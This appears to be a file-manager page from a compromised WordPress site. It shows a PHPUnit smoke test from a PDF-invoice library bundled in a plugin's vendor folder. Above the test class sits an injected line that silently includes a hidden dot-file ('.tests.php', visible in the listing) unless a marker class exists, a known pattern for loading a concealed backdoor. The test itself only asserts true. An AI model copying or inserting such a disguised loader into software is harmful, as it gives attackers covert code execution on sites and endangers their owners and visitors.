PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wiloke-listing-tools
/
vendor
/
konekt
/
pdf-invoice
/
tests
<?php /** * Contains the AAASmokeTest.php class. * * @copyright Copyright (c) 2017 Attila Fulop * @author Attila Fulop * @license GPL * @since 2017-12-15 * */ namespace Konekt\PdfInvoice\Tests; use PHPUnit\Framework\TestCase; if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class AAASmokeTest extends TestCase { const MIN_PHP_VERSION = '5.6.0'; /** * Very Basic smoke test case for testing against parse errors, etc * * @test */ public function smoke() { $this->assertTrue(true); } }
[+]
..
[-] .tests.php
[edit]
[-] BaseClassTest.php
[edit]
[-] AAASmokeTest.php
[edit]